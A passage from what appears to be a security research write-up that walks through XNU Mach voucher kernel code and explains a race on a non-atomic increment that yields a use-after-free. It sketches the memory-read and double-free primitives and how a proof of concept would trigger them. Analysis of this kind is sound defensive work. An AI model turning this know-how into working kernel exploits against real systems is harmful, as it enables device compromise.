Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_iv,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

boolean_t key_priv)

{

iv_index_t prev_val_index;

iv_index_t val_index;

kern_return_t kr;

switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

default:

kr = ipc_replace_voucher_value(voucher,

key,

command,

prev_iv,

content,

content_size);

if (KERN_SUCCESS != kr) {

return kr;

}

break;

}

return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

ipc_voucher_t voucher,

mach_voucher_attr_key_t key,

mach_voucher_attr_recipe_command_t command,

ipc_voucher_t prev_voucher,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

...

/*

* Get the manager for this key_index.

* Returns a reference on the control.

*/

key_index = iv_key_to_index(key);

ivgt_lookup(key_index, TRUE, &ivam, &ivac);

if (IVAM_NULL == ivam) {

return KERN_INVALID_ARGUMENT;

}

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

return IV_UNUSED_KEYINDEX;

}

return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

/* save the current value stored in the forming voucher */

save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

if (key_index < iv->iv_table_size) {

return iv->iv_table[key_index];

}

return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

prev_val_index = (IV_NULL != prev_voucher) ?

iv_lookup(prev_voucher, key_index) :

save_val_index;

Then the code looks up the actual previous value to operate on:

ivace_lookup_values(key_index, prev_val_index,

previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

iv_index_t key_index,

iv_index_t value_index,

mach_voucher_attr_value_handle_array_t values,

mach_voucher_attr_value_handle_array_size_t *count)

{

ipc_voucher_attr_control_t ivac;

ivac_entry_t ivace;

if (IV_UNUSED_VALINDEX == value_index ||

MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

*count = 0;

return;

}

ivac = iv_global_table[key_index].ivgte_control;

assert(IVAC_NULL != ivac);

/*

* Get the entry and then the linked values.

*/

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

/*

* TODO: support chained values (for effective vouchers).

*/

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(ivace->ivace_refs > 0);

values[0] = ivace->ivace_value;

ivac_unlock(ivac);

*count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

/* Call out to resource manager to get new value */

new_value_voucher = IV_NULL;

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_recipe_command_t command,

mach_voucher_attr_value_handle_array_t prev_values,

mach_voucher_attr_value_handle_array_size_t prev_value_count,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

mach_voucher_attr_value_handle_t *out_value,

mach_voucher_attr_value_flags_t *out_flags,

ipc_voucher_t *out_value_voucher)

{

user_data_element_t elem;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

/* never an out voucher */

*out_value_voucher = IPC_VOUCHER_NULL;

*out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

case MACH_VOUCHER_ATTR_USER_DATA_STORE:

if (USER_DATA_MAX_DATA < content_size) {

return KERN_RESOURCE_SHORTAGE;

}

/* empty is the default */

if (0 == content_size) {

*out_value = 0;

return KERN_SUCCESS;

}

elem = user_data_dedup(content, content_size);

*out_value = (mach_voucher_attr_value_handle_t)elem;

return KERN_SUCCESS;

default:

/* every other command is unknown */

return KERN_INVALID_ARGUMENT;

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

iv_index_t sum;

iv_index_t hash;

user_data_element_t elem;

user_data_element_t alloc = NULL;

sum = user_data_checksum(content, content_size);

hash = USER_DATA_HASH_BUCKET(sum);

retry:

user_data_lock();

queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

assert(elem->e_hash == hash);

/* if sums match... */

if (elem->e_sum == sum && elem->e_size == content_size) {

iv_index_t i;

/* and all data matches */

for (i = 0; i < content_size; i++) {

if (elem->e_data[i] != content[i]) {

break;

}

if (i < content_size) {

continue;

}

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

if (NULL != alloc) {

kfree(alloc, sizeof(*alloc) + content_size);

}

return elem;

}

if (NULL == alloc) {

user_data_unlock();

alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

alloc->e_made = 1;

alloc->e_size = content_size;

alloc->e_sum = sum;

alloc->e_hash = hash;

memcpy(alloc->e_data, content, content_size);

goto retry;

}

queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

user_data_unlock();

return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

/* TODO: value insertion from returned voucher */

if (IV_NULL != new_value_voucher) {

iv_release(new_value_voucher);

}

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

/*

* Find or create a slot in the table associated

* with this attribute value. The ivac reference

* is transferred to a new value, or consumed if

* we find a matching existing value.

*/

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

iv_set(voucher, key_index, val_index);

/*

* Look up the values for a given <key, index> pair.

*

* Consumes a reference on the passed voucher control.

* Either it is donated to a newly-created value cache

* or it is released (if we piggy back on an existing

* value cache entry).

*/

static iv_index_t

ivace_reference_by_value(

ipc_voucher_attr_control_t ivac,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_flags_t flag)

{

ivac_entry_t ivace = IVACE_NULL;

iv_index_t hash_index;

iv_index_t index;

if (IVAC_NULL == ivac) {

return IV_UNUSED_VALINDEX;

}

ivac_lock(ivac);

restart:

hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

index = ivac->ivac_table[hash_index].ivace_index;

while (index != IV_HASH_END) {

assert(index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[index];

assert(!ivace->ivace_free);

if (ivace->ivace_value == value) {

break;

}

assert(ivace->ivace_next != index);

index = ivace->ivace_next;

}

/* found it? */

if (index != IV_HASH_END) {

/* only add reference on non-persistent value */

if (!ivace->ivace_persist) {

ivace->ivace_refs++;

ivace->ivace_made++;

}

ivac_unlock(ivac);

ivac_release(ivac);

return index;

}

/* insert new entry in the table */

index = ivac->ivac_freelist;

if (IV_FREELIST_END == index) {

/* freelist empty */

ivac_grow_table(ivac);

goto restart;

}

/* take the entry off the freelist */

ivace = &ivac->ivac_table[index];

ivac->ivac_freelist = ivace->ivace_next;

/* initialize the new entry */

ivace->ivace_value = value;

ivace->ivace_refs = 1;

ivace->ivace_made = 1;

ivace->ivace_free = FALSE;

ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

/* insert the new entry in the proper hash chain */

ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

ivac->ivac_table[hash_index].ivace_index = index;

ivac_unlock(ivac);

/* donated passed in ivac reference to new entry */

return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

ivace->ivace_refs++;

ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

iv_index_t key_index,

iv_index_t value_index)

{

assert(key_index < iv->iv_table_size);

iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

ip_kobject = reference-counted pointer to the voucher

}

voucher {

iv_refs = 1;

iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

ivace_table[index] =

{

ivace_refs = 1;

ivace_made = 1;

ivace_value = pointer to user_data_value_element

}

user_data_value_element {

e_made = 1;

e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

for (i = 0; i < iv->iv_table_size; i++) {

ivace_release(i, iv->iv_table[i]);

}

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

iv_index_t key_index,

iv_index_t value_index)

{

...

ivgt_lookup(key_index, FALSE, &ivam, &ivac);

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(0 < ivace->ivace_refs);

/* cant release persistent values */

if (ivace->ivace_persist) {

ivac_unlock(ivac);

return;

}

if (0 < --ivace->ivace_refs) {

ivac_unlock(ivac);

return;

}

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

key = iv_index_to_key(key_index);

assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

/*

* if last return reply is still pending,

* let it handle this later return when

* the previous reply comes in.

*/

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

/* claim releasing */

ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

value = ivace->ivace_value;

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

/*

* new made values raced with this return. If the

* manager OK'ed the prior release, we have to start

* the made numbering over again (pretend the race

* didn't happen). If the entry has zero refs again,

* re-drive the release.

*/

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_reference_t sync)

{

user_data_element_t elem;

iv_index_t hash;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

elem = (user_data_element_t)value;

hash = elem->e_hash;

user_data_lock();

if (sync == elem->e_made) {

queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

user_data_unlock();

kfree(elem, sizeof(*elem) + elem->e_size);

return KERN_SUCCESS;

}

assert(sync < elem->e_made);

user_data_unlock();

return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_free_value let's look back at the callsite:

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

/*

* new made values raced with this return. If the

* manager OK'ed the prior release, we have to start

* the made numbering over again (pretend the race

* didn't happen). If the entry has zero refs again,

* re-drive the release.

*/

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

/*

* If the manager returned FAILURE, someone took a

* reference on the value but have not updated the ivace,

* release the lock and return since thread who got

* the new reference will update the ivace and will have

* non-zero reference on the value.

*/

if (KERN_SUCCESS != kr) {

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

}

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

if (0 == ivace->ivace_refs) {

goto redrive;

}

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

/*

* If the manager returned FAILURE, someone took a

* reference on the value but have not updated the ivace,

* release the lock and return since thread who got

* the new reference will update the ivace and will have

* non-zero reference on the value.

*/

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

